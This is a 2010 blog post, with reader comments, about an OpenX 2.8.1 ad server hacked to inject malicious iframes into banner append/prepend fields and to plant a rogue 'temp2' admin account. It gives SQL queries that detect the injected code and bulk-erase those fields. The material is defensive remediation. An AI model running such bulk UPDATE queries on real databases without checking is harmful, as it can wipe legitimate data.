OpenX Vulnerability: “This Site May Harm Your Computer”
August 6th, 2010
09/16/2010 Update: An update has been made to this post after another security hole has been discovered in OpenX, allowing hackers to inject malicious code again.
Yesterday I got multiple emails from Google regarding some of my websites that were supposedly pushing malware (or badware, whatever you want to call it) to the visitors’ computer:
Malware notification regarding www.mywebsite.com
Dear site owner or webmaster of mywebsite.com,
We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.
Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):
www.mywebsite.com
Here is a link to a sample warning page:
http://www.google.com/interstitial?url=www.mywebsite.com
We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:
1) the site was compromised
2) the site doesn’t monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiserIf your site was compromised, it’s important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
http://www.stopbadware.org/home/security
Once you’ve secured your site, you can request that the warning be removed by visiting
http://www.google.com/support/webmasters/bin/answer.py?answer=45432
and requesting a review. If your site is no longer harmful to users, we will remove the warning.Sincerely,
Google Search Quality TeamNote: if you have an account in Google’s Webmaster Tools, you can verify the authenticity of this message by logging into https://www.google.com/webmasters/tools/siteoverview and going to the Message Center, where a warning will appear shortly.
At first I wasn’t even sure of the legitimacy of the emails so I went to my Google Webmaster Tools account to find out it was actually true.
Fortunately, Google gave me a few hints as to what code was suspicious so I got to find out it was due to OpenX. And as I use a single OpenX server to serve ads over all my websites, this caused Google to flag almost all of them as harmful. Within an hour, I got from 30,000+ visitors a day to almost nothing.
What Happened
I hadn’t updated OpenX in a while and was running version 2.8.1. This version is vulnerable to attacks where an IFRAME is embedded within the banner script which requests data from a badware site.
By using phpMyAdmin, I quickly found out which banners were affected:
SELECT * FROM ox_banners WHERE append LIKE '%ifra%' OR prepend LIKE '%ifra%';SELECT * FROM ox_zones WHERE append LIKE '%ifra%' OR prepend LIKE '%ifra%';
How to Fix This
First of all, get the latest version of OpenX and upgrade it. Next, if you’re sure you’ve never used any “append” or “prepend” code in any of your banners, simply issue these two SQL queries using phpMyAdmin :
UPDATE ox_banners SET append = null, prepend = null WHERE append LIKE '%ifra%' OR prepend LIKE '%ifra%';UPDATE ox_zones SET append = null, prepend = null WHERE append LIKE '%ifra%' OR prepend LIKE '%ifra%';
Otherwise you’ll have to edit each banner entry manually through either OpenX or phpMyAdmin to remove the malicious code.
Once you’ve cleaned up everything, delete the banner cache. You can do this by using an FTP client and deleting everything from /[openx directory/var/cache/
And finally you need to submit a review request to Google so that the warning is being removed from your site. This can be done by using either the Google Webmaster Tools by using the link you got in the warning email.
Related Posts
- How to Restore a Website from Google’s Cache
- WebHostingHub Site Performance According to Google
- Google Rolls Out New Notification Service, Tells Searchers if a Website Has Been Compromised
- OpenX Security Update 2.8.7
- Google’s Chrome Web Browser Beta Launch
- No Ad Serving On HostGator Account?
- How To Use OpenX (Video)
- Follow Up On OpenX Installation Issue On GoDaddy Hosting
How to Compile and Install PHP From Source September 6, 2011
How to Install mod_cloudflare on a cPanel Server June 27, 2011
HostGator Now Offers BaseKit Website Builder February 8, 2012
Go Daddy Offers an Early Look at New Super Bowl Ad (Video) February 2, 2012
MyHosting Now With goMobi Mobile Builder February 1, 2012
How to Reduce Your Bandwidth Consumption January 31, 2012
- How to Install mod_cloudflare on a cPanel Server
Ryan: I’m getting this error, any ideas? root@server1 [/usr/local/src]# wget... - How To Backup Your GoDaddy Website
Guest: Great guide for backing up your website AND database here: http://www.photocs.net/back... - Is Your Host Complaining About Your Resource Usage?
The Web Hosting Hero: From phpMyAdmin, select the desired table and then click the... - Is Your Host Complaining About Your Resource Usage?
The Web Hosting Hero: http://stackoverflow.com/quest ions/1108/how-does-database-in dexing-work - Is Your Host Complaining About Your Resource Usage?
The Web Hosting Hero: @Praveen: no there no such thing as “indexing scripts”. What...
Latest Web Hosting Deals
- MyHosting Valentine Promo - Basic Hosting for $2.95
- MyHosting VPS Promo Code - 20% Off On All VPS Orders
- SingleHop Coupon Code - 15% Off Lifetime
- SingleHop Coupon Code - 50% Off 1st Month + 2x Bandwidth
- SingleHop Coupon Code - 50% Off 1st Month
- FutureHosting Coupon Code - 40% Off Lifetime Discount
- DowntownHost Coupon - Get 50% Off 1st Payment
Hosting Reviews
 |  |  |
17 responses so far ↓
1. Response by : Dony on Aug 19, 2010 at 11:09 am
I had the same bug,How to prevent it?
2. Response by : The Web Hosting Hero on Aug 19, 2010 at 11:10 am
Make sure you update OpenX to the latest version.
3. Response by : Jerry on Sep 10, 2010 at 3:07 am
you can also password protect your www/admin folder
4. Response by : Derrick Threatt on Sep 16, 2010 at 7:37 am
they got smart… now they change it…. iframe wont work… they spilt the words…
so now its “ifra” “me”
so now change %iframe% to %/ifra%
5. Response by : Derrick Threatt on Sep 16, 2010 at 7:44 am
OH wow… now you have to run this on ox_zones and ox_banners. they’ve infected both tables
6. Response by : The Web Hosting Hero on Sep 16, 2010 at 8:30 am
Thank you Derrick, I will update this post accordingly!
7. Response by : OpenX Security Update 2.8.7 on Sep 16, 2010 at 9:01 am
[...] 16th, 2010 · No Comments Just over a month ago, I made a post about our OpenX server being hacked, pushing malware to visitors’ computers and how to fix it. Unfortunately, hackers found a way [...]
8. Response by : Derrick Threatt on Sep 17, 2010 at 1:26 pm
Looks like it created an admin user too called temp2 email address asd@asd.com you might want to delete that too because my site got reinfected today.
9. Response by : Chris on Sep 18, 2010 at 1:19 am
How did it get reinfected if your up to date? I had the same problem. with the temp2 account. What did you end up doing to secure it?
10. Response by : Derrick Threatt on Sep 18, 2010 at 8:01 am
The 2.8.7 patch fixed the vulnerability of creating the admin account but doesn’t fix the damage….so you have to manually delete that account or the malware can keep coming in the door it created even though the fix is installed. now that I have deleted that account I am good to go.
11. Response by : Uno on Sep 28, 2010 at 4:59 am
We’re moving away from Openx because of this. It’s a mission to fix and it doesn’t seem OpenX is serious about it. It’s happened about 3 times to us. Now we’ve upgraded, applied all the security measures and it still happened.
Cheers openx!
12. Response by : Jack Yan on Oct 26, 2010 at 12:48 am
Thank you, everyone, for your feedback. We got hit over the weekend. Incidentally, I wonder if the htaccess method described on this page would work. I’ve implemented it—now, it’s a game of wait and see.
http://forum.openx.org/index.php?showtopic=503453491&st=15&gopid=275381
13. Response by : Ilya Ber on Nov 4, 2010 at 11:58 am
Guys and girls,
Don’t forget to remove the “temp” users from the ox_users table, otherwise the injections will continue even with the upgraded OpenX.
14. Response by : Ivan on Nov 25, 2010 at 5:32 am
Hey guys I need help. Can someone tell me how to prevent worhless links from openx to my site? I have 15000 links but they are nofollow or something like that. Can this have negative impact by google on my website? Thank you!
15. Response by : Jack Yan on Nov 25, 2010 at 3:57 pm
Hi Ivan: my reply is not going to be too helpful because I don’t know how to remove those links, or even how they came about, but if they look automated, I would say that, almost certainly, Google will penalize you.
Are you saying the links are coming from your OpenX install on your own server, or are they coming from OpenX’s own website?
16. Response by : Ivan on Nov 26, 2010 at 2:43 am
Dear Jack, thank you for responding. The links are coming from openx installed on our subdomain. We have an openx channel called “channel north croatia” and have gather 5 news portals from our region and we have banners on each site. When they put new article automatically we recieve new backlink. Do we need move openx to another server or openx have some option for excluding this links? Or something like that? Thank you again.
17. Response by : Filippo Ronco on Dec 3, 2010 at 3:05 pm
A big question I can’t figure out:
Once you’ve asked google to review your site and they give you the green light for the url where you’ve installed the adserver, all the other url of websites in the network will be updated in a “auto-cascade mode” or they need to ask for a review for malware one by one anyway?
Thanks a lot.
Filippo
Leave a Comment